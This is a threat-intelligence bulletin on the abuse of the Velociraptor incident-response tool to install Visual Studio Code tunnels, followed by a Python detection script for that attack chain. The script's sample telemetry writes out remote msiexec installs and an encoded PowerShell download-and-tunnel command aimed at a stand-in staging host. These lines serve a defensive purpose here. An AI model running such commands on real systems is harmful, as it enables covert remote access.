Current Cyber Threats

Velociraptor Incident Response Tool Abused for Remote Access

Summary:
In August 2025, researchers from Sophos analyzed an intrusion where attackers deployed the legitimate open-source Velociraptor digital forensics and incident response tool. Instead of using it for defense, the attackers abused Velociraptor to download and run Visual Studio Code with the tunneling feature enabled, likely to create a connection back to their command-and-control server. This activity raised a Taegis alert because Visual Studio Code tunnels can grant remote access and remote code execution, a technique previously exploited by multiple threat groups. The attackers retrieved Velociraptor via the Windows msiexec utility from a Cloudflare Workers domain that also hosted other malicious tools such as Cloudflare Tunnel and Radmin. Once installed, Velociraptor communicated with a C2 server. Through an encoded PowerShell command, the threat actor then downloaded Visual Studio Code from the same staging domain and executed it with tunneling enabled, installing it as a service and logging its output. The actor later used msiexec again to pull down additional malware from the same infrastructure.

The attempted tunneling was detected in time, prompting a Sophos investigation. The compromised host was quickly isolated, which disrupted the attacker’s operation before they could escalate to ransomware deployment.
Security Officer Comments:
This intrusion highlights a growing trend where attackers repurpose legitimate security and administration tools for malicious objectives. By abusing Velociraptor and Visual Studio Code’s tunneling feature, the threat actor attempted to establish covert access while minimizing reliance on traditional malware, which would normally trigger faster detection. The use of Cloudflare Workers for staging tools also reflects an effort to blend malicious traffic with legitimate cloud services, complicating attribution and detection.
Suggested Corrections:
Defenders are advised to monitor for unexpected installations of legitimate IR and remote-administration tools such as Velociraptor and Visual Studio Code, to investigate suspicious tunneling activity and encoded PowerShell execution, and to maintain strong endpoint detection and response capabilities. Proactive detection and swift remediation can significantly reduce the impact of these attacks.
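The following is an added example of the kind of endpoint detection logic the guidance above describes; it is not code from the Sophos report or from the Velociraptor project. It runs four rules over process-creation events that mirror the chain described in the summary (msiexec installing from a remote URL, an IR tool spawning a shell, an encoded PowerShell command that downloads or starts a tunnel, and Visual Studio Code launched in tunnel mode) and then groups hits per host. The events, the staging domain `staging.example.workers.dev`, the file names and the encoded script are all constructed for the example.

```python
import base64
import re
from dataclasses import dataclass

# --- Constructed sample telemetry (process-creation events); not from the Sophos report ---
STAGING = "https://staging.example.workers.dev"   # hypothetical staging host
CONSTRUCTED_SCRIPT = (
    f"Invoke-WebRequest -Uri {STAGING}/vscode.zip -OutFile C:\\ProgramData\\vscode.zip; "
    "Start-Process C:\\ProgramData\\code.exe -ArgumentList 'tunnel'"
)
# PowerShell -EncodedCommand takes base64 of the UTF-16LE script text
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"ts": "2025-08-14T10:02:11Z", "host": "WS-017", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": f"msiexec.exe /i {STAGING}/velociraptor.msi /qn"},
    {"ts": "2025-08-14T10:05:40Z", "host": "WS-017",
     "parent": "C:\\Program Files\\Velociraptor\\Velociraptor.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ts": "2025-08-14T10:06:02Z", "host": "WS-017",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\ProgramData\\code.exe",
     "cmdline": "code.exe tunnel service install --accept-server-license-terms --name ws-017"},
    # Benign activity on another host that the rules must not flag
    {"ts": "2025-08-14T11:30:00Z", "host": "WS-022", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\alice\\Downloads\\7z2301-x64.msi /qn"},
    {"ts": "2025-08-14T11:31:00Z", "host": "WS-022", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_OR_TUNNEL = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\btunnel\b",
    re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded script of a PowerShell -EncodedCommand invocation, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:          # covers binascii.Error on malformed base64
        return None


@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    detail: str


def detect(events):
    """Apply the four rules to every event and return the findings in event order."""
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        # Rule 1: msiexec pulling a package straight from a URL
        if image == "msiexec.exe" and REMOTE_URL.search(cmd):
            findings.append(Finding(ev["ts"], ev["host"], "msiexec_remote_install", cmd))
        # Rule 2: the IR agent itself spawning a command shell
        if parent.startswith("velociraptor") and image in SHELLS:
            findings.append(Finding(ev["ts"], ev["host"], "ir_tool_spawned_shell", f"{parent} -> {image}"))
        # Rule 3: encoded PowerShell whose decoded body downloads something or starts a tunnel
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded and DOWNLOAD_OR_TUNNEL.search(decoded):
                findings.append(Finding(ev["ts"], ev["host"], "encoded_ps_download_or_tunnel", decoded[:80]))
        # Rule 4: Visual Studio Code launched in tunnel mode
        if image in ("code.exe", "code-tunnel.exe") and re.search(r"\btunnel\b", cmd, re.IGNORECASE):
            findings.append(Finding(ev["ts"], ev["host"], "vscode_tunnel", cmd))
    return findings


def triage(findings):
    """Group findings per host; two or more distinct rules on one host is rated high."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f.host, set()).add(f.rule)
    return {h: {"rules": sorted(r), "severity": "high" if len(r) >= 2 else "medium"}
            for h, r in per_host.items()}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.ts} {f.host} {f.rule}: {f.detail}")
    print(triage(hits))
```

Each rule on its own is noisy in a real estate (software deployment tools also call msiexec with URLs, and developers legitimately run `code tunnel`), which is why `triage` only escalates a host once several independent stages of the chain have fired there; in production the same logic would be fed from Sysmon event ID 1 or an EDR process stream rather than the inline list.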

Link(s):
https://news.sophos.com/en-us/2025/...ident-response-tool-abused-for-remote-access/